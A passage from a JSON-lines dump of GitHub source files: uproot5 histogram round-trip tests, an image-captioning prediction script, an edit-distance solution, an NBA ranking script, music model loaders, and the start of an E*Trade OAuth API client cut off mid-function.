h2.GetBinContent(9, 8, 1) == 0\n f.Close()\n\n\ndef test_issue_0659(tmp_path):\n # https://github.com/scikit-hep/uproot5/issues/659\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n cat_axis = hist.axis.IntCategory([10, 11, 12], label=\"Category\")\n reg_axis = hist.axis.Regular(100, 0, 100, label=\"Random\")\n reg_axis_z = hist.axis.Regular(50, 20, 30, label=\"RandomZ\")\n h = hist.Hist(cat_axis)\n h2 = hist.Hist(cat_axis, reg_axis)\n h3 = hist.Hist(cat_axis, reg_axis, reg_axis_z)\n h.fill(np.random.randint(1, 4, 1000))\n h2.fill(np.random.randint(1, 4, 1000), np.random.normal(20, 5, 1000))\n h3.fill(\n np.random.randint(1, 4, 1000),\n np.random.normal(20, 5, 1000),\n np.random.normal(25, 2, 1000),\n )\n\n with uproot.recreate(newfile) as fout:\n fout[\"h\"] = h\n fout[\"h2\"] = h2\n fout[\"h3\"] = h3\n\n with uproot.open(newfile) as fin:\n h_opened = fin[\"h\"]\n assert h_opened.values(flow=False).shape == (3,)\n assert h_opened.values(flow=True).shape == (5,)\n assert h_opened.axis(0).edges().tolist() == [0.0, 1.0, 2.0, 3.0]\n\n h2_opened = fin[\"h2\"]\n assert h2_opened.values(flow=False).shape == (3, 100)\n assert h2_opened.values(flow=True).shape == (5, 102)\n assert h2_opened.axis(0).edges().tolist() == [0.0, 1.0, 2.0, 3.0]\n assert h2_opened.axis(1).edges().tolist() == list(map(float, range(101)))\n\n h3_opened = fin[\"h3\"]\n assert h3_opened.values(flow=False).shape == (3, 100, 50)\n assert h3_opened.values(flow=True).shape == (5, 102, 52)\n assert h3_opened.axis(0).edges().tolist() == [0.0, 1.0, 2.0, 3.0]\n assert h3_opened.axis(1).edges().tolist() == list(map(float, range(101)))\n assert h3_opened.axis(2).edges().tolist() == list(np.linspace(20, 30, 51))\n\n h_opened.to_hist()\n h2_opened.to_hist()\n h3_opened.to_hist()\n\n f = ROOT.TFile(newfile)\n h_opened2 = f.Get(\"h\")\n h2_opened2 = f.Get(\"h2\")\n h3_opened2 = f.Get(\"h3\")\n\n assert h_opened2.GetBinContent(0) == 0.0\n assert h2_opened2.GetBinContent(0) == 0.0\n assert h3_opened2.GetBinContent(0) == 0.0\n\n f.Close()\n\n\ndef test_issue_722(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n h = ROOT.TH1D(\"h\", \"h\", 10, 0.0, 1.0)\n h.FillRandom(\"gaus\", 10000)\n\n assert len(h.GetSumw2()) == 0\n\n fout = ROOT.TFile(newfile, \"RECREATE\")\n h.Write()\n fout.Close()\n\n # open with uproot\n with uproot.open(newfile) as fin:\n h1 = fin[\"h\"]\n\n assert len(h1.axes) == 1\n assert h1.axis(0).edges().tolist() == pytest.approx(\n [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]\n )\n assert len(h1.member(\"fSumw2\")) == 0\n\n # convert to hist\n h2 = h1.to_hist()\n assert str(h2.storage_type) == \"\"\n\n # write and read again\n with uproot.recreate(newfile) as fout2:\n fout2[\"h\"] = h2\n\n with uproot.open(newfile) as fin2:\n h3 = fin2[\"h\"]\n\n assert len(h3.member(\"fSumw2\")) == 0\n\n\ndef test_hist_weights_from_root(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n h = ROOT.TH1D(\"h\", \"h\", 20, 0.0, 5.0)\n for _ in range(1000):\n # fill with random values and random weights\n h.Fill(5.0 * np.random.random(), np.random.random())\n\n assert len(h.GetSumw2()) == 22 # 20 bins + 2, should not be 0 since we have weights\n\n fout = ROOT.TFile(newfile, \"RECREATE\")\n h.Write()\n fout.Close()\n\n with uproot.open(newfile) as fin:\n h1 = fin[\"h\"]\n\n assert len(h1.member(\"fSumw2\")) == 22\n\n h2 = h1.to_hist()\n assert str(h2.storage_type) == \"\"\n\n # write and read again\n with uproot.recreate(newfile) as fout2:\n fout2[\"h\"] = h2\n\n with uproot.open(newfile) as fin2:\n h3 = fin2[\"h\"]\n\n assert len(h3.member(\"fSumw2\")) == 22\n\n\ndef test_hist_weights_labels_from_root(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n h_weights = ROOT.TH1D(\n \"h_weights\", \"histogram with weights with labels\", 12, 0.0, 5.0\n )\n h_noweights = ROOT.TH1D(\n \"h_noweights\", \"histogram without weights with labels\", 12, 0.0, 5.0\n )\n h_noweights_nolabels = ROOT.TH1D(\n \"h_noweights_nolabels\", \"histogram without weights\", 12, 0.0, 5.0\n )\n for _ in range(1000):\n # fill with random values and random weights\n h_weights.Fill(5.0 * np.random.random(), np.random.random())\n h_noweights.Fill(5.0 * np.random.random())\n h_noweights_nolabels.Fill(5.0 * np.random.random())\n\n assert h_weights.GetNbinsX() == h_noweights.GetNbinsX()\n for i in range(h_weights.GetNbinsX()):\n h_weights.GetXaxis().SetBinLabel(i + 1, f\"label_{i}\")\n h_noweights.GetXaxis().SetBinLabel(i + 1, f\"label_{i}\")\n\n assert len(h_weights.GetSumw2()) == 14 # 12 bins + 2\n assert len(h_noweights.GetSumw2()) == 0\n assert len(h_noweights_nolabels.GetSumw2()) == 0\n assert h_weights.GetXaxis().GetLabels().GetSize() == 12\n assert h_noweights.GetXaxis().GetLabels().GetSize() == 12\n\n fout = ROOT.TFile(newfile, \"RECREATE\")\n h_weights.Write()\n h_noweights.Write()\n h_noweights_nolabels.Write()\n fout.Close()\n\n with uproot.open(newfile) as fin:\n h_weights1 = fin[\"h_weights\"]\n h_noweights1 = fin[\"h_noweights\"]\n h_noweights_nolabels1 = fin[\"h_noweights_nolabels\"]\n\n assert len(h_weights1.member(\"fSumw2\")) == 14\n assert len(h_noweights1.member(\"fSumw2\")) == 0\n assert len(h_noweights_nolabels1.member(\"fSumw2\")) == 0\n\n h_weights2 = h_weights1.to_hist()\n h_noweights2 = h_noweights1.to_hist()\n h_noweights_nolabels2 = h_noweights_nolabels1.to_hist()\n assert str(h_weights2.storage_type) == \"\"\n assert str(h_noweights2.storage_type) == \"\"\n assert (\n str(h_noweights_nolabels2.storage_type)\n == \"\"\n )\n\n\ndef test_hist_weights_2D(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n h_2D_noweights_nolabels = ROOT.TH2D(\n \"h_2D_noweights_nolabels\", \"2D\", 20, 0.0, 5.0, 10, -10.0, 10.0\n )\n h_2D_weights_nolabels = ROOT.TH2D(\n \"h_2D_weights_nolabels\", \"2D\", 20, 0.0, 5.0, 10, -10.0, 10.0\n )\n h_2D_noweights_labels = ROOT.TH2D(\n \"h_2D_noweights_labels\", \"2D\", 20, 0.0, 5.0, 10, -10.0, 10.0\n )\n h_2D_weights_labels = ROOT.TH2D(\n \"h_2D_weights_labels\", \"2D\", 20, 0.0, 5.0, 10, -10.0, 10.0\n )\n\n for _ in range(1000):\n # fill with random values and random weights\n h_2D_noweights_nolabels.Fill(\n 5.0 * np.random.random(), 10.0 * np.random.random()\n )\n h_2D_weights_nolabels.Fill(\n 5.0 * np.random.random(), 10.0 * np.random.random(), np.random.random()\n )\n h_2D_noweights_labels.Fill(5.0 * np.random.random(), 10.0 * np.random.random())\n h_2D_weights_labels.Fill(\n 5.0 * np.random.random(), 10.0 * np.random.random(), np.random.random()\n )\n\n assert (\n h_2D_noweights_nolabels.GetNbinsX()\n == h_2D_weights_nolabels.GetNbinsX()\n == h_2D_noweights_labels.GetNbinsX()\n == h_2D_weights_labels.GetNbinsX()\n == 20\n )\n assert (\n h_2D_noweights_nolabels.GetNbinsY()\n == h_2D_weights_nolabels.GetNbinsY()\n == h_2D_noweights_labels.GetNbinsY()\n == h_2D_weights_labels.GetNbinsY()\n == 10\n )\n for i in range(h_2D_weights_labels.GetNbinsX()):\n h_2D_weights_labels.GetXaxis().SetBinLabel(i + 1, f\"label_{i}\")\n h_2D_noweights_labels.GetXaxis().SetBinLabel(i + 1, f\"label_{i}\")\n for i in range(h_2D_noweights_labels.GetNbinsY()):\n # add y labels to this one\n h_2D_noweights_labels.GetYaxis().SetBinLabel(i + 1, f\"label_{i}\")\n\n assert (\n len(h_2D_weights_nolabels.GetSumw2())\n == len(h_2D_weights_labels.GetSumw2())\n == 264\n )\n assert (\n len(h_2D_noweights_nolabels.GetSumw2())\n == len(h_2D_noweights_labels.GetSumw2())\n == 0\n )\n\n assert (\n h_2D_weights_labels.GetXaxis().GetLabels().GetSize()\n == h_2D_noweights_labels.GetXaxis().GetLabels().GetSize()\n == 20\n )\n assert h_2D_noweights_labels.GetYaxis().GetLabels().GetSize() == 10\n\n fout = ROOT.TFile(newfile, \"RECREATE\")\n h_2D_noweights_nolabels.Write()\n h_2D_weights_nolabels.Write()\n h_2D_noweights_labels.Write()\n h_2D_weights_labels.Write()\n fout.Close()\n\n with uproot.open(newfile) as fin:\n h_2D_noweights_nolabels = fin[\"h_2D_noweights_nolabels\"]\n h_2D_weights_nolabels = fin[\"h_2D_weights_nolabels\"]\n h_2D_noweights_labels = fin[\"h_2D_noweights_labels\"]\n h_2D_weights_labels = fin[\"h_2D_weights_labels\"]\n\n h_2D_noweights_nolabels.to_hist()\n h_2D_weights_nolabels.to_hist()\n h_2D_noweights_labels.to_hist()\n h_2D_weights_labels.to_hist()\n\n\ndef test_hist_weights_3D(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n h_3D_noweights_nolabels = ROOT.TH3D(\n \"h_3D_noweights_nolabels\", \"3D\", 20, 0.0, 5.0, 10, -10.0, 10.0, 5, -5.0, 5.0\n )\n h_3D_weights_nolabels = ROOT.TH3D(\n \"h_3D_weights_nolabels\", \"3D\", 20, 0.0, 5.0, 10, -10.0, 10.0, 5, -5.0, 5.0\n )\n h_3D_noweights_labels = ROOT.TH3D(\n \"h_3D_noweights_labels\", \"3D\", 20, 0.0, 5.0, 10, -10.0, 10.0, 5, -5.0, 5.0\n )\n h_3D_weights_labels = ROOT.TH3D(\n \"h_3D_weights_labels\", \"3D\", 20, 0.0, 5.0, 10, -10.0, 10.0, 5, -5.0, 5.0\n )\n\n for _ in range(1000):\n # fill with random values and random weights\n h_3D_noweights_nolabels.Fill(\n 5.0 * np.random.random(), 10.0 * np.random.random(), 2 * np.random.random()\n )\n h_3D_weights_nolabels.Fill(\n 5.0 * np.random.random(),\n 10.0 * np.random.random(),\n 2 * np.random.random(),\n np.random.random(),\n )\n h_3D_noweights_labels.Fill(\n 5.0 * np.random.random(), 10.0 * np.random.random(), 2 * np.random.random()\n )\n h_3D_weights_labels.Fill(\n 5.0 * np.random.random(),\n 10.0 * np.random.random(),\n 2 * np.random.random(),\n np.random.random(),\n )\n\n assert (\n h_3D_noweights_nolabels.GetNbinsX()\n == h_3D_weights_nolabels.GetNbinsX()\n == h_3D_noweights_labels.GetNbinsX()\n == h_3D_weights_labels.GetNbinsX()\n == 20\n )\n assert (\n h_3D_noweights_nolabels.GetNbinsY()\n == h_3D_weights_nolabels.GetNbinsY()\n == h_3D_noweights_labels.GetNbinsY()\n == h_3D_weights_labels.GetNbinsY()\n == 10\n )\n assert (\n h_3D_noweights_nolabels.GetNbinsZ()\n == h_3D_weights_nolabels.GetNbinsZ()\n == h_3D_noweights_labels.GetNbinsZ()\n == h_3D_weights_labels.GetNbinsZ()\n == 5\n )\n for i in range(h_3D_noweights_labels.GetNbinsX()):\n h_3D_weights_labels.GetXaxis().SetBinLabel(i + 1, f\"label_{i}\")\n for i in range(h_3D_noweights_labels.GetNbinsZ()):\n # add z labels to this one\n h_3D_noweights_labels.GetZaxis().SetBinLabel(i + 1, f\"label_{i}\")\n\n assert (\n len(h_3D_weights_nolabels.GetSumw2())\n == len(h_3D_weights_labels.GetSumw2())\n == 1848\n )\n assert (\n len(h_3D_noweights_nolabels.GetSumw2())\n == len(h_3D_noweights_labels.GetSumw2())\n == 0\n )\n\n assert h_3D_weights_labels.GetXaxis().GetLabels().GetSize() == 20\n assert h_3D_noweights_labels.GetZaxis().GetLabels().GetSize() == 5\n\n fout = ROOT.TFile(newfile, \"RECREATE\")\n h_3D_noweights_nolabels.Write()\n h_3D_weights_nolabels.Write()\n h_3D_noweights_labels.Write()\n h_3D_weights_labels.Write()\n fout.Close()\n\n with uproot.open(newfile) as fin:\n h_3D_noweights_nolabels = fin[\"h_3D_noweights_nolabels\"]\n h_3D_weights_nolabels = fin[\"h_3D_weights_nolabels\"]\n h_3D_noweights_labels = fin[\"h_3D_noweights_labels\"]\n h_3D_weights_labels = fin[\"h_3D_weights_labels\"]\n\n h_3D_noweights_nolabels.to_hist()\n h_3D_weights_nolabels.to_hist()\n h_3D_noweights_labels.to_hist()\n h_3D_weights_labels.to_hist()\n","repo_name":"scikit-hep/uproot5","sub_path":"tests/test_0422-hist-integration.py","file_name":"test_0422-hist-integration.py","file_ext":"py","file_size_in_byte":17479,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"3"} +{"seq_id":"25974710511","text":"from PIL import Image\nfrom io import BytesIO\nimport cv2\nimport base64\nfrom tqdm import tqdm\nimport urllib.request\nfrom keras_preprocessing.sequence import pad_sequences\nimport numpy as np\nimport summarize\nimport requests\n\n\ndef predict(model, resnet, vocab, inv_vocab, data, count_api):\n max_len = 40\n\n loc = 'static/file.jpg'\n if 'call' not in data.keys():\n img = data['file'].split(',')[1]\n img = Image.open(BytesIO(base64.decodebytes(bytes(img, 'utf-8'))))\n img.save(loc)\n else:\n urllib.request.urlretrieve(\n data['data']['image_urls'],\n loc)\n\n print(\"=\"*50)\n print(\"IMAGE SAVED\")\n\n image = cv2.imread('static/file.jpg')\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n image = cv2.resize(image, (224, 224))\n\n image = np.reshape(image, (1, 224, 224, 3))\n\n incept = resnet.predict(image).reshape(1, 2048)\n\n print(\"=\"*50)\n print(\"Predict Features\")\n\n text_in = ['startofseq']\n\n final = ''\n\n print(\"=\"*50)\n print(\"GETING Captions\")\n\n count = 0\n while tqdm(count < 20):\n\n count += 1\n\n encoded = []\n for i in text_in:\n encoded.append(vocab[i])\n\n padded = pad_sequences(\n [encoded], maxlen=max_len, padding='post', truncating='post').reshape(1, max_len)\n\n sampled_index = np.argmax(model.predict([incept, padded]))\n\n sampled_word = inv_vocab[sampled_index]\n\n if sampled_word != 'endofseq':\n final = final + ' ' + sampled_word\n\n text_in.append(sampled_word)\n\n result = {'caption': final}\n\n # if 'article' in data['data'].keys():\n # text = data['data']['article']\n # description = summarize.text_summarize(text, count_api)\n # result = {\n # 'caption': final,\n # 'description': description\n # }\n return result\n","repo_name":"AyushSolanki123/captic-model","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17040881567","text":"#Python3\n#week -5 - assign3\nimport numpy as np\ndef Distance(A,B):\n c= np.zeros((len(A),len(B)),int)\n for i in range(len(A)):\n c[i][0] = i\n for i in range(len(B)):\n c[0][i] = i\n for i in range(1,len(A)):\n for j in range(1,len(B)):\n if A[i] != B[j]:\n c[i][j] = min(c[i-1][j-1],c[i-1][j],c[i][j-1]) + 1\n else:\n c[i][j] = min(c[i-1][j-1],c[i-1][j]+1,c[i][j-1]+1) \n return c[len(A)-1][len(B)-1]\nstring1 = \" \" +input()\nstring2 = \" \" +input()\nA = [char for char in string1]\nB = [char for char in string2]\nprint(Distance(A,B))","repo_name":"JuhiSrivastava/Algorithmic-Toolbox","sub_path":"C1 - Week5/edit_distance.py","file_name":"edit_distance.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8061726132","text":"import torch\n\n\ndef music2mel(clip):\n if len(clip.shape) == 1:\n clip = clip.unsqueeze(0)\n\n from trainer.injectors.audio_injectors import TorchMelSpectrogramInjector\n inj = TorchMelSpectrogramInjector({'n_mel_channels': 256, 'mel_fmax': 11000, 'filter_length': 16000,\n 'normalize': True, 'true_normalization': True, 'in': 'in', 'out': 'out'}, {})\n return inj({'in': clip})['out']\n\n\ndef music2cqt(clip):\n def normalize_cqt(cqt):\n # CQT_MIN = 0\n CQT_MAX = 18\n return 2 * cqt / CQT_MAX - 1\n\n if len(clip.shape) == 1:\n clip = clip.unsqueeze(0)\n from nnAudio.features.cqt import CQT\n # Visually, filter_scale=.25 seems to be the most descriptive representation, but loses frequency fidelity.\n # It may be desirable to mix filter_scale=.25 with filter_scale=1.\n cqt = CQT(sr=22050, hop_length=256, n_bins=256, bins_per_octave=32, filter_scale=.25, norm=1, verbose=False)\n return normalize_cqt(cqt(clip))\n\n\ndef get_mel2wav_model():\n from models.audio.music.unet_diffusion_waveform_gen_simple import DiffusionWaveformGen\n model = DiffusionWaveformGen(model_channels=256, in_channels=16, in_mel_channels=256, out_channels=32, channel_mult=[1,2,3,4,4],\n num_res_blocks=[3,3,2,2,1], token_conditioning_resolutions=[1,4,16], dropout=0, kernel_size=3, scale_factor=2,\n time_embed_dim_multiplier=4, unconditioned_percentage=0)\n model.load_state_dict(torch.load(\"../experiments/music_mel2wav.pth\", map_location=torch.device('cpu')))\n model.eval()\n return model\n\n\ndef get_mel2wav_v3_model():\n from models.audio.music.unet_diffusion_waveform_gen3 import DiffusionWaveformGen\n model = DiffusionWaveformGen(model_channels=256, in_channels=16, in_mel_channels=256, out_channels=32, channel_mult=[1,1.5,2,4],\n num_res_blocks=[2,1,1,0], mid_resnet_depth=24, token_conditioning_resolutions=[1,4],\n dropout=0, time_embed_dim_multiplier=1, unconditioned_percentage=0)\n model.load_state_dict(torch.load(\"../experiments/music_mel2wav_v3.pth\", map_location=torch.device('cpu')))\n model.eval()\n return model\n\n\ndef get_music_codegen():\n from models.audio.mel2vec import ContrastiveTrainingWrapper\n model = ContrastiveTrainingWrapper(mel_input_channels=256, inner_dim=1024, layers=24, dropout=0,\n mask_time_prob=0,\n mask_time_length=6, num_negatives=100, codebook_size=16, codebook_groups=4,\n disable_custom_linear_init=True, do_reconstruction_loss=True)\n model.load_state_dict(torch.load(f\"../experiments/m2v_music.pth\", map_location=torch.device('cpu')))\n model = model.eval()\n return model\n\n\ndef get_cheater_encoder():\n from models.audio.music.gpt_music2 import UpperEncoder\n encoder = UpperEncoder(256, 1024, 256)\n encoder.load_state_dict(\n torch.load('../experiments/music_cheater_encoder_256.pth', map_location=torch.device('cpu')))\n encoder = encoder.eval()\n return encoder\n\n\ndef get_cheater_decoder():\n from models.audio.music.transformer_diffusion12 import TransformerDiffusionWithCheaterLatent\n model = TransformerDiffusionWithCheaterLatent(in_channels=256, out_channels=512, model_channels=1024,\n contraction_dim=512, prenet_channels=1024, input_vec_dim=256,\n prenet_layers=6, num_heads=8, num_layers=16, new_code_expansion=True,\n dropout=0, unconditioned_percentage=0)\n model.load_state_dict(torch.load(f'../experiments/music_cheater_decoder.pth', map_location=torch.device('cpu')))\n model = model.eval()\n return model\n\n\ndef get_ar_prior():\n from models.audio.music.cheater_gen_ar import ConditioningAR\n cheater_ar = ConditioningAR(1024, layers=24, dropout=0, cond_free_percent=0)\n cheater_ar.load_state_dict(torch.load('../experiments/music_cheater_ar.pth', map_location=torch.device('cpu')))\n cheater_ar = cheater_ar.eval()\n return cheater_ar","repo_name":"neonbjb/DL-Art-School","sub_path":"codes/utils/music_utils.py","file_name":"music_utils.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"3"} +{"seq_id":"34818575254","text":"\"\"\"\nIs offense or defense a better indicator for overall ranking in the NBA?\n\nTook the average points for and aganist a NBA team as the basis for offensive and defensive rankings.\nCompared the overall ranking, determined by their season record, to the offensive and defensive rankings.\nThe 2014-2015 NBA statistics is provided by http://www.basketball-reference.com/leagues/NBA_2015.html\n\"\"\"\nimport csv\nimport sys\n\n\nresults = []\nwith open('Overall_rank', newline='') as inputfile: # Gets input from file and parses into a 2D list\n for i in csv.reader(inputfile):\n results.append(i)\n\nteam_rank = []\ntemp = []\nfor i in results: # Adds overall rank, name, and record\n temp.append(i[0])\n temp.append(i[1])\n temp.append(i[2])\n team_rank.append(temp)\n temp = []\n\nresults.clear()\nwith open('Offense', newline='') as inputfile:\n for i in csv.reader(inputfile):\n results.append(i)\n\ntemp_str = \"\"\nfor i in results: # Adds Offense ranking and average points per game\n if i[1][len(i[1]) - 1] == '*': # removes askerisks from end of names (if there is one)\n tempstr = (i[1])[:len(i[1]) - 1]\n else:\n tempstr = i[1]\n for j in team_rank:\n if tempstr == j[1]:\n j.append(i[0])\n j.append(i[len(i) - 1])\n\n\nresults.clear()\nwith open('Defense', newline='') as inputfile:\n for i in csv.reader(inputfile):\n results.append(i)\n\nfor i in results: # Adds deffense ranking and average point per game aganist\n if i[1][len(i[1]) - 1] == '*':\n tempstr = (i[1])[:len(i[1]) - 1]\n else:\n tempstr = i[1]\n for j in team_rank:\n if tempstr == j[1]:\n j.append(i[0])\n j.append(i[len(i) - 1])\n\ndefense_rank_dif = 0\noffense_rank_dif = 0\nfor i in team_rank: # calculates average differences\n defense_rank_dif += abs(int(i[0]) - int(i[5]))\n offense_rank_dif += abs(int(i[0]) - int(i[3]))\ndefense_rank_dif /= 30\noffense_rank_dif /= 30\nprint('Average difference between overall ranking and offensive ranking = %s\\n'\n 'Average difference between overall ranking and defensive ranking = %s\\n'\n % (offense_rank_dif, defense_rank_dif))\n\nprint('Rank Name Record Offensive Ranking Points Per Game Defensive Ranking Points Per Game')\nfor i in team_rank: # prints with spacing\n sys.stdout.write(i[0])\n sys.stdout.write(' ')\n sys.stdout.write(i[1])\n length_counter = len(i[1])\n while length_counter < 30:\n sys.stdout.write(' ')\n length_counter += 1\n print(i[2], ' ', i[3], ' ', i[4], ' ', i[5], ' ', i[6])","repo_name":"haochiencho/NBA-Rankings","sub_path":"NBA_stats.py","file_name":"NBA_stats.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42302633984","text":"from typing import Tuple, List, Optional, Union, Any, Sequence, Dict\n\nimport xmltodict\nfrom requests_oauthlib import OAuth1Session, requests\n\n\n#\n#\n#\nclass EtradeAuthorization:\n def __init__(self):\n self.__auth_session = None\n\n def get_request_token(self, consumer_key: str, consumer_secret: str) -> str:\n self.__auth_session = OAuth1Session(consumer_key, consumer_secret, callback_uri='oob', signature_type='AUTH_HEADER')\n self.__auth_session.fetch_request_token('https://api.etrade.com/oauth/request_token')\n authorization_url = self.__auth_session.authorization_url('https://us.etrade.com/e/t/etws/authorize')\n a_key = self.__auth_session.parse_authorization_response(authorization_url)\n return '%s?key=%s&token=%s' % ('https://us.etrade.com/e/t/etws/authorize', consumer_key, a_key['oauth_token'])\n\n def get_access_token(self, verifier: str) -> dict:\n return self.__auth_session.fetch_access_token('https://api.etrade.com/oauth/access_token', verifier=verifier)\n\n @staticmethod\n def get_session(consumer_key: str, consumer_secret: str, tokens: dict) -> OAuth1Session:\n return OAuth1Session(consumer_key, consumer_secret, tokens['oauth_token'],\n tokens['oauth_token_secret'], signature_type='AUTH_HEADER')\n\n\n#\n#\n#\nclass EtradeApi:\n QuoteData = Tuple[str, Dict[str, float]]\n\n #\n #\n #\n def __init__(self, session: OAuth1Session, use_product_key: bool):\n self.__use_product_key = use_product_key\n self.__base_url_dev = 'https://apisb.etrade.com/v1/'\n self.__base_url_prod = 'https://api.etrade.com/v1/'\n self.__session = session\n\n #\n #\n #\n def revoke_access_token(self) -> None:\n \"\"\"Revokes access token.\"\"\"\n resp = self.__session.get('https://api.etrade.com/oauth/revoke_access_token')\n resp.raise_for_status()\n resp = xmltodict.parse(resp.text)\n if 'Error' in resp: # TODO Not fully tested.\n raise ValueError(resp['Error']['message'])\n\n #\n #\n #\n def __get_url(self, command: str = '') -> str:\n if self.__use_product_key:\n return self.__base_url_prod + command\n else:\n return self.__base_url_dev + command\n\n #\n #\n #\n @staticmethod\n def __to_list(list_or_object: Union[Sequence, Any]) -> List[Any]:\n if isinstance(list_or_object, list):\n return list_or_object\n if isinstance(list_or_object, tuple):\n return list(list_or_object)\n return [list_or_object]\n\n #\n #\n #\n def get_account_balance(self, account_id: str) -> Tuple[float, float, float]:\n \"\"\"Retrieves account balance.\n\n Args:\n account_id: Id of the account where the request has to be performed.\n\n Returns:\n Total account value\n Amount of cash available for investment\n Amount of cash not settled\n \"\"\"\n api_url = self.__get_url('accounts/' + account_id + '/balance?instType=BROKERAGE&realTimeNAV=true')\n resp = self.__session.get(api_url)\n\n info = self.__retrieve_response(resp)\n info = info['BalanceResponse']['Computed']\n return (float(info['RealTimeValues']['totalAccountValue']),\n float(info['settledCashForInvestment']),\n float(info['unSettledCashForInvestment']))\n\n #\n #\n #\n def list_accounts(self) -> List[Tuple[int, int, str, str]]:\n \"\"\"Lists all available accounts.\n\n Returns:\n A list of (account number, account id, account description, account key)\n \"\"\"\n api_url = self.__get_url('accounts/list')\n resp = self.__session.get(api_url)\n\n accounts = self.__retrieve_response(resp)\n accounts = self.__to_list(accounts['AccountListResponse']['Accounts']['Account'])\n accounts = [(i, accounts[i]['accountId'], accounts[i]['accountDesc'], accounts[i]['accountIdKey']) for i in range(len(accounts))]\n return accounts\n\n #\n #\n #\n def get_account_positions(self, account_id: str) -> List[Tuple[str, float, float, float]]:\n \"\"\"Retrieves all account positions.\n\n Args:\n account_id: Id of the account where the request has to be performed.\n\n Returns:\n A list of (symbol, qty, currentPrice, costBasis)\n \"\"\"\n # TODO Paging is not implemented.\n api_url = self.__get_url('accounts/' + str(account_id) + '/portfolio')\n resp = self.__session.get(api_url)\n\n positions = self.__retrieve_response(resp)\n positions = self.__to_list(positions['PortfolioResponse']['AccountPortfolio']['Position'])\n positions = [(\n p['Product']['symbol'].strip().upper(),\n float(p['quantity']),\n float(p['marketValue']) / float(p['quantity']),\n float(p['totalCost'])) for p in positions]\n return positions\n\n #\n #\n #\n @staticmethod\n def __format_quote(data: dict, label: str) -> Dict[str, float]:\n export_data = {'ask': float(data['ask']),\n 'bid': float(data['bid']),\n 'high': float(data['high']),\n 'low': float(data['low']),\n 'lastTrade': float(data['lastTrade']),\n 'totalVolume': float(data['totalVolume'])}\n if export_data['bid'] == 0 and export_data['ask'] == 0:\n export_data['ask'] = export_data['lastTrade']\n export_data['bid'] = export_data['lastTrade']\n if label == 'All':\n export_data['askSize'] = float(data['askSize'])\n export_data['bidSize'] = float(data['bidSize'])\n export_data['eps'] = float(data['eps'])\n export_data['estEarnings'] = float(data['estEarnings'])\n export_data['dividend'] = float(data['dividend'])\n export_data['symbolDescription'] = data['symbolDescription']\n return export_data\n\n #\n #\n #\n def get_quote(self, symbols: Sequence[str], only_intraday_data: bool) -> List[QuoteData]:\n \"\"\"Retrieves quote information.\n\n Args:\n symbols: List of symbols to retrieve.\n only_intraday_data: Boolean indicating if the only intraday data has to be retrieve.\n\n Returns:\n A list of QuoteData where QuoteData = (symbol, symbol_data).\n Symbol_data contains:\n intraday: 'ask', 'bid', 'high', 'low', 'lastTrade', 'totalVolume'\n all: 'askSize', 'bidSize', 'eps', 'estEarnings', 'dividend', 'symbolDescription'\n \"\"\"\n if len(symbols) > 25:\n raise ValueError('get_quote: Too many symbols to quote.')\n\n api_url = self.__get_url('market/quote/' + ','.join(symbols))\n params = {'detailFlag': 'ALL'} if not only_intraday_data else {'detailFlag': 'INTRADAY'}\n resp = self.__session.get(api_url, params=params)\n\n data = self.__retrieve_response(resp)\n data = data['QuoteResponse']['QuoteData']\n label = 'All' if not only_intraday_data else 'Intraday'\n if isinstance(data, dict):\n return [(data['Product']['symbol'], self.__format_quote(data[label], label))]\n else:\n return [(x['Product']['symbol'], self.__format_quote(x[label], label)) for x in data]\n\n #\n #\n #\n def list_orders(self, account_id: str, count: int, marker: Optional[int]) -> Tuple[Sequence[dict], Optional[int]]:\n \"\"\"Retrieves all orders.\n\n Args:\n account_id: Id of the account where the request has to be performed.\n count: Number of orders to retrieve.\n marker: Marker of the first order to retrieve.\n\n Returns:\n order_data: List of orders.\n current_marker: Next marker.\n \"\"\"\n api_url = self.__get_url('accounts/' + account_id + '/orders')\n\n params = {'count': count}\n if marker is not None:\n params['marker'] = marker\n\n resp = self.__session.get(api_url, params=params)\n\n resp = self.__retrieve_response(resp)\n resp = resp['OrdersResponse']\n current_marker = None\n if 'marker' in resp:\n if len(resp['marker']) != 0:\n current_marker = int(resp['marker'])\n order_list = self.__to_list(resp['Order'])\n\n order_data = []\n for o in order_list:\n order_info = {'orderId': int(o['orderId'])}\n o = o['OrderDetail']\n order_info['orderStatus'] = o['status']\n order_info['symbol'] = o['Instrument']['Product']['symbol']\n order_info['orderAction'] = o['Instrument']['orderAction']\n order_info['orderedQuantity'] = o['Instrument']['orderedQuantity']\n order_info['orderTerm'] = o['orderTerm']\n order_info['marketSession'] = o['marketSession']\n if order_info['orderStatus'] == 'EXECUTED':\n order_info['executedPrice'] = o['Instrument']['averageExecutionPrice']\n order_info['filledQuantity'] = o['Instrument']['filledQuantity']\n if order_info['orderStatus'] == 'OPEN':\n order_info['priceType'] = o['priceType']\n if order_info['priceType'] == 'LIMIT':\n order_info['limitPrice'] = o['limitPrice']\n if order_info['priceType'] == 'STOP':\n order_info['stopPrice'] = o['stopPrice']\n if order_info['priceType'] == 'STOP_LIMIT':\n order_info['limitPrice'] = o['limitPrice']\n order_info['stopPrice'] = o['stopPrice']\n order_data.append(order_info)\n\n return order_data, current_marker\n\n #\n #\n #\n @staticmethod\n def __check_order(**kwargs) -> None:\n mandatory = [\n 'accountId',\n 'symbol',\n 'orderAction',\n 'clientOrderId',\n 